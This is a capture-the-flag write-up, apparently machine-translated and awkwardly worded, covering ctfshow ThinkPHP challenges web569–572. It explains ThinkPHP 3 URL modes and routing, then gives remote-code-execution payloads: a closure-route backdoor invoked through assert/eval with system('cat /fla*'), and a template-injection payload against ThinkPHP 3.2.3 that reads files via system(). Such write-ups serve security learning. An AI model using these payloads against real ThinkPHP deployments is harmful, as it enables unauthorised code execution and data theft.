Ctfshow ThinkPHP topic 1

web569

Before doing this question , Under the first thinkphp3 Of URL Pattern ,ThinkPHP Supported by URL There are four modes ： Common mode 、PATHINFO、REWRITE And compatibility mode .

An entry file is a single entry for an application , All requests to the application are directed to the application entry file , The system will URL Parameter to parse the module of the current request block 、 Controls and operation ：

http://serverName/index.php/ modular / controller / operation 

-- Common mode :

The common mode is also the traditional GET Pass parameters to specify the currently accessed module and operation , for example ：

http://localhost/?m=home&c=user&a=login&var=value

m Parameter representation module ,c The parameter represents the controller ,a Parameters represent operations （ Of course, these parameters can be configured ）, The latter indicates others GET ginseng Count .

--PATHINFO Pattern :

PATHINFO Mode is the default of the system URL Pattern , Provides the best SEO Support , Environment compatibility has been done inside the system , So I can Support most host environments . Corresponding to the above URL Pattern ,PATHINFO Under Mode URL The address is ：

http://localhost/index.php/home/user/login/var/value/

PATHINFO The first three parameters of the address represent the module / controller / operation .

--REWRITE Pattern :

REWRITE The pattern is PATHINFO Rewriting rule support is added on the basis of pattern , Can be removed URL The entry file in the address index.php, But it needs extra configuration WEB Rewriting rules for servers .

http://localhost/home/user/login/var/value

-- Compatibility mode :

Compatibility mode is used for unsupported PATHINFO The special environment ,URL The address is ：

http://localhost/?s=/home/user/login/var/value

The parameter s From ThinkPHP->Conf->convention.php Medium VAR_PATH_INFO Set up , You can change the name definition of the compatibility mode variable

Back to topic 569, Required pathinfo Mode to access , that payload Just a simple .( The default is case insensitive )

payload:

http://671a5ba9-1876-433b-85fd-ed8f400f61fa.challenge.ctf.show/index.php/Admin/Login/ctfshowLogin

web570 

  Add the knowledge of routing

Use the routing function , You can make your URL The address is more concise and elegant .ThinkPHP Support for module URL Address for routing （ Routing functions Is aimed at PATHINFO Mode or compatible URL And designed , Normal... Is not supported for the time being URL Pattern ）.

ThinkPHP The routing functions of include ：

• Regular routing
• Rule routing
• Static routing (URL mapping )
• Closure support

Closure definition

We can use closures to define routes with special requirements , There is no need to execute the operation method of the controller , for example ：

'URL_ROUTE_RULES'=>array(
    'test' =>function(){
       echo 'just test';
       },

    'hello/:name' =>function($name){
       echo 'Hello,'.$name;
       }
）

When we visit url The address is ：http://url/index.php/test, Then the output of the browser is ： just test

When we visit url The address is ：http://url/index.php/jack, Then the output of the browser is ： Hello jack

  stay Application/Commom/Conf/config.php in , Find closure route backdoor

  When we visit url/index.php/ctfshow/aaa/bbb when , Will execute call_user_func(aaa,bbb) function

PHP Function details ：call_user_func() Usage method - djiz - Blog Garden

 call_user_func(aaa,bbb) Is to perform aaa() function ,bbb As its parameter  

In use get Pass parameter will appear ; and / The situation that cannot be transmitted , At this time, you can pass parameters like this ：

#get
url/index.php/ctfshow/assert/eval($_POST[1])
#post
1=system('cat /fla*');

web571

ThinkPHP 3.2.3 Loophole recurrence - Safe guest , Security information platform

 Home\Controller\IndexController  Under the index A controllable parameter is passed in

  Follow up all the way to  fetch(), Then all the way into  Hook::listen('view_parse', $params);

    public function fetch($templateFile='',$content='',$prefix='') {
        if(empty($content)) {
            $templateFile   =   $this->parseTemplate($templateFile);
            //  The template file does not exist. Return directly 
            if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);
        }else{
            defined('THEME_PATH') or    define('THEME_PATH', $this->getThemePath());
        }
        //  Page caching 
        ob_start();
        ob_implicit_flush(0);
        if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { //  Use PHP Native templates 
            $_content   =   $content;
            //  Template array variables are decomposed into independent variables 
            extract($this->tVar, EXTR_OVERWRITE);
            //  Load... Directly PHP Templates 
            empty($_content)?include $templateFile:eval('?>'.$_content);
        }else{
            //  View resolution label 
            $params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix);
            Hook::listen('view_parse',$params);
        }
        //  Get and empty the cache 
        $content = ob_get_clean();
        //  Content filter tag 
        Hook::listen('view_filter',$content);
        //  Output template file 
        return $content;
    }

yu22x: 

You can see our incoming n That is to say content stay TMPL_ENGINE_TYPE yes php In this case, it will enter eval Function .

So we pass it directly php The code will do .
payload：

?n=<?php system('cat /f*');?>

web572

This question requires the use of blasting to obtain key information , Non scanning , The number of explosions will not exceed 365 Time , Otherwise, it is invalid

  The blasting date comes out , See from ?showctf Sure rce

/index.php?showctf=<?php system("cat /f*");?>